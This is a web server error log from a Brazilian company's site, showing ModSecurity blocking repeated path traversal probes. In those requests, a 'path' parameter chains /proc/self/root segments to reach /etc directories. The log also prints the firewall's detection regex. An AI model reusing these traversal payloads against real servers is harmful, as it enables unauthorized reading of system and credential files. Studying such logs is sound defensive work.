[Tue Mar 17 15:31:39.743139 2026] [:error] [pid 18380:tid 140411599251200] [client 74.7.241.31:45204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmeC64xEDsg_V3ESNZU7wAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:31:44.827620 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.241.31:50184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmeEKBJNF7axNlVR0UhmQAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:31:46.140418 2026] [:error] [pid 17965:tid 140411691570944] [client 74.7.241.31:50196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmeEqt8Nd0UC_OcbVHS6QAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:31:53.005806 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:56908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmeGdY0UrI5A3LftIwGPAAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:31:56.139290 2026] [proxy_fcgi:error] [pid 9299:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:41510] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:32:19.137650 2026] [proxy_fcgi:error] [pid 2473:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41936] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:32:26.799151 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.243.128:54804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmeOhj0p0SRWAqcjGGCdAAAAwc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:32:42.989788 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42328] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:33:05.053076 2026] [proxy_fcgi:error] [pid 7004:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42778] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:33:22.659471 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.243.128:37038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmecgeiSKl8TjouI-YiIAAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:33:26.735710 2026] [:error] [pid 18380:tid 140411649607424] [client 74.7.243.128:38848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmedq4xEDsg_V3ESNZVDwAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:33:27.250822 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.244.43:50832] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmedweiSKl8TjouI-YiIQAAA8U"]
[Tue Mar 17 15:33:28.494997 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:58950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmeeBj0p0SRWAqcjGGCmQAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:33:29.069806 2026] [proxy_fcgi:error] [pid 9299:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43318] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:33:51.122948 2026] [proxy_fcgi:error] [pid 7437:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:43738] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:33:52.809916 2026] [:error] [pid 9299:tid 140411725141760] [client 74.7.228.61:39172] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmekL-sgTmmJoPuMdy_kwAAAsI"]
[Tue Mar 17 15:33:54.704268 2026] [:error] [pid 6296:tid 140411674785536] [client 74.7.243.128:38860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmeknIk7brgkOH-rIWUkgAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:34:13.129804 2026] [proxy_fcgi:error] [pid 9299:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44124] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:34:16.928236 2026] [:error] [pid 7004:tid 140411741927168] [client 74.7.243.128:48824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmeqMU6Sx0TG1YjmQi4uAAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:34:35.141836 2026] [proxy_fcgi:error] [pid 2598:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44502] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:34:56.057826 2026] [proxy_fcgi:error] [pid 7437:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44870] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:35:17.121775 2026] [proxy_fcgi:error] [pid 9299:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45220] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:35:27.707932 2026] [:error] [pid 7004:tid 140411599251200] [client 74.7.241.31:59838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abme78U6Sx0TG1YjmQi42QAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:35:39.273811 2026] [proxy_fcgi:error] [pid 2473:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45602] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:36:02.061887 2026] [proxy_fcgi:error] [pid 9299:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46044] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:36:24.153808 2026] [proxy_fcgi:error] [pid 29151:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:46402] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:36:46.125849 2026] [proxy_fcgi:error] [pid 9299:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46760] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:36:50.565970 2026] [core:alert] [pid 6296:tid 140411565680384] [client 74.7.241.31:40160] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/sys/fs
[Tue Mar 17 15:37:07.136382 2026] [proxy_fcgi:error] [pid 9299:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:47124] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:37:29.059764 2026] [proxy_fcgi:error] [pid 6296:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47448] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:37:36.591220 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.241.31:47104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmfcKBJNF7axNlVR0UiIQAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:37:51.137796 2026] [proxy_fcgi:error] [pid 17965:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47836] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:38:13.126047 2026] [proxy_fcgi:error] [pid 7004:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48204] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:38:28.179292 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.244.43:37122] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmfpHIk7brgkOH-rIWU-wAAAUo"]
[Tue Mar 17 15:38:36.299176 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:39742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmfrBj0p0SRWAqcjGGDCAAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:38:37.121071 2026] [proxy_fcgi:error] [pid 2473:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48640] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:38:37.141450 2026] [:error] [pid 29151:tid 140411632822016] [client 74.7.243.128:50150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmfrfPqhzTj3BvfDX-RkAAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:38:46.239124 2026] [:error] [pid 7004:tid 140411574073088] [client 74.7.241.31:35988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmftsU6Sx0TG1YjmQi5HgAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:38:59.117955 2026] [proxy_fcgi:error] [pid 6296:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:49070] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:39:02.541690 2026] [:error] [pid 6296:tid 140411674785536] [client 74.7.228.61:60284] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmfxnIk7brgkOH-rIWVAwAAAUg"]
[Tue Mar 17 15:39:21.122872 2026] [proxy_fcgi:error] [pid 18380:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49516] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:39:22.975880 2026] [:error] [pid 18380:tid 140411708356352] [client 74.7.241.31:42908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmf2q4xEDsg_V3ESNZVmwAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:39:24.691189 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.241.31:42896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmf3KBJNF7axNlVR0UiQAAAAAs"], referer: 